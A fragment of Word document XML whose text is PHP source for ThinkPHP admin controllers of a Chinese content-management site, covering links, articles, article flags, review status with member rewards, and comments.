      </w:r>
    </w:p>
    <w:p w14:paraId="5042C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C249D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13BBF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CBA5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04DB42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A9A42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B05D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929AD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DFF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579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2516D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B94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9B891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C44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D514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1BBC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0B0D5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18F62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37741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Link extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8F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58BD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0031CB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link')-&gt;order('des desc,id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116833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65826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6E562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085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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F680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261D83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5451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7C29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01132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link')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC2A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D779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505EF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39F0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7CEC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1F132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0D1DD2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link')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B3B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BB66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2FD5A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36D3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F666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1450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61B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3560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627E8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link')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640893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381D6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5BBA0A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345A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285B9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222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46D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53C4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43C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329B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2FC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1F135A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495F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7309E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F4711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article')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54718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3905C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74307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93B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4900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57A1C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89A48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1E49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A71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388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2AAF8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B9B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2CC9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D859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9C536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lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC7A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5088D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2C4FBB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09D65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7E958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48985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16F4F8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4EF0A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rticle extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AC8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BA9D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D090B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input('mychannel');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1CF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8E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mychannel']=$mychannel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3658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EA4C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ychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2493DE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Db::name('typeid')-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFA0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get_tree_option($typeiddb,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356A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search_name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7789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d=input('param.search_typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED5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input('param.typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05935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s=input('param.flags');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C89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itoutiao=input('param.weitoutiao');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EA1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA2F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itle|tags|description']=['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF0A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972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typeid &amp;&amp; $typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C3D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ypeid']  = $search_typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD4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FF1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typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB80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ypeid']  = $search_typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC3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E6B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5ADFE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ypeid']  = $typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D52A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D09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7B6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lags){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C552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flags']=$flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39487E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1E26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weitoutiao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A57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eitoutiao']=['in','1,2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE1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ED1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in','0,1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D739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rticle')-&gt;order('des desc,id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B54E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4E9C8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5048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7A1A5E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0B34C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9B8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3D925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ychannel=input('mychannel');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE3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Db::name('mychannel')-&gt;where('id',$mychannel)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00790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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4D8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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E55F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F990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ychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A0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s=Db::name('flags')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72325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flags',$flags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB438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Db::name('typeid')-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4D9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get_tree_option($typeiddb,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CB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6E34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7461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6B6C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id'] || $post['uid']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E17D2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id']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FED6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7684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eitoutiao']=='1' &amp;&amp; input('mychannel')==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED534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post['images'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C03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age){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D550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上传图片</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F11F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5B42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json_decode($image,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F11C5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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6B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v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF6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3DC7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mages']=htmlspecialchars(json_encode($img));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E195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8E56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ypeid']&lt;=0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA25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D719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pdate_time']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF83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strtotime($post['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964E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FB23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624DEC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6CA3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7CBBAB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id']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A06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mychannel['id']==3 || $mychannel['id']==4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B14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video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D9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视频地址必须填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC67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D84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mychannel['id']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C946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ADF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模型</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C68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9C89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post['content'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F659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ontent'] = htmlspecialchars_decode($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DBA6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924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CE2CF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mychannel']=$mychannel['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E8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itle']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E68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itledb=Db::name('article')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D4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0F78E2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文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BF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F47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9C4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2D924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insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA55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915A5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E89DF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A583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45893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F2A8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442FC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where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF1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6CA8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23C9A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5BA3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55A76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7DB9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436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8106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0D852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rticle')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2C5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31F93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41EC0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49A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F601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5DE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E554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8E916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23A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0DB9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220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1(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63E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article/add',['mychannel'=&gt;'1','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD5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659C9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CFF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2(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D62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article/add',['mychannel'=&gt;'2','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C6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1F580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39A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3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF5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article/add',['mychannel'=&gt;'3','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6E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3503F1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4FF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4(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3E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article/add',['mychannel'=&gt;'4','url'=&gt;'-1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B9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1F456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D03F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612A87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79B8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input('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642873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EDD1D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delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CA5B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536BB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1FCC4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A3464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470BA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4F5AB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B9C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15675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8639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D5C5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AA62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EE88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10A56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B20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sAll(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D857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5363A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C800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POST['des'] as $k =&gt; $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3617BC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tval($k);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8E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ntval($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B6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id)-&gt;setField('des',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C26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FFF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更新排序成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AB6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9FC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类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4FED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65C9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AFF4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FBA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All(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270425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515C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F50C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post.delAll')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EB1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post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768331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delete($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B2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04A5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FFAF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921E7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4B15D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5D4D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D75B1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未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734F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7DB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681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类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74F9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91A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32D2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F320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ll(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B438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7A147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ost=input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B9A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C648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post.delAll')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DA5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post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF56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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08882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ost as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E44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del'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081D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delete($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CE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4E94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where('id',$v)-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FB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8D8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295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5C358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12190C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5FBF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0D4638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F1F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204D7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未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDDED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F4F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BAC87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类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D49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FB6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A02B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30E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lags(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315FF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flags')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897DF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56E3F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1985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59F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lags_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF9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594FF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01E4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3E967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7C415F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730AB3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7C9A3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442D5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flags')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B746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5B38CE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2D4BF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7F1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0874F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flags')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B729A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6AB05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2A026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99F6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339E4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99B67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39DA1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flags')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D8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db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A880A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700A2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C64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3E2D1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2B1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55F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8D0E6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post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B3B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850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5ADC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5D7F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flags')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B7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4773D3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417AE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2D0EC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410EA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0C3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E6E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CFAF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2F5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7CB8F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5562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lagsDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C02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3E5A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CA74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8EB0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ACC2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Db::name('article')-&gt;where('flags',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05954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dmin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E66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flags')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268CE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6FAFA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6563A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B86A1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36F18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B55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C7C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属性下有文章，请先删除文章对应属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D817E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ED9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1309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661A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751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253C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3B8E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D01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8E3BA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735E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6BEA4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51838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 ? input('id'): '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4BC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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2A8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0'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','1'=&gt;'&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/font&gt;','2'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','3'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C4C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4847F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Db::name('article')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20ED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itlce['uid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F43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0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721ED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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>管理员设置隐藏状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FE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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8FA0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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FE8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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A6C2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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>管理员设置审核状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D843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9297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D05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itlce['uid'] &amp;&amp; $type==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48908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name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C18C1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dd=$data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4B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Hide=$data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71263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core=$data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6216C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Num=$data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E613F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Code=$data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE7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Jingyan=$data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD30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Money=$data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0E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4C772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ticleMoney){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12560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Db::name('member_records')-&gt;where(['type'=&gt;'money','text'=&gt;'</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data'=&gt;'+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F4E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itlcejiance){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE1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articleMoney,'money','+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55D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aritlce['uid'])-&gt;setInc('money',$articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F44C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2BA8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E0C1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ticleScore){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C601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Db::name('member_records')-&gt;where(['type'=&gt;'score','text'=&gt;'</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data'=&gt;'+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E3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itlcejiance){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6677B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articleScore,'score','+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19173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aritlce['id'])-&gt;setInc('score',$articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0B9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460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85B2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ticleJingyan){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BAC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Db::name('member_records')-&gt;where(['type'=&gt;'jingyan','text'=&gt;'</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lastRenderedPageBreak/>
        <w:t>'.$aritlce['id'],'data'=&gt;'+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC21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rticleJingyan){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F12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articleJingyan,'jingyan','+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE2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this-&gt;member['id'])-&gt;setInc('jingyan',$articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D59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4DD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54FB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aritlce['id'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71388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1332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where('id',$aritlce['id'])-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43992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53EB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type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33396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DB3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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDBD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FA4F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15E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ET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329742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D9D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320E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提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F663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F3B2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3146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F3D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view(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087EB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in','2,3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025E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rticle')-&gt;where($map)-&gt;order('des desc,id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482CF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0DE81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7309C8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page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596975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DBC8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4923B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79119B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rticle_ping')-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B3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1988F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378775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2AF65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DD20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325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Add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC80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2BCF7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21C2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1E15D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where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464817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6C98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0C3332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1458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5E9C5A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4B50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763F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0E29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1135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rticle_ping')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D4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Db::name('article')-&gt;where('id',$name['aid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442722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List=Db::name('article_ping_xia')-&gt;where('ping_id',$id)-&gt;order('id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E9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pingList-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D74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57CC3E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518FD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article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA5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0D6FEC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ingList',$pingList);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C863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79045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4D58E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C87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4D9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41751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48FE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2588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F4F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Del(){</w:t>
      </w:r>
    </w:p>
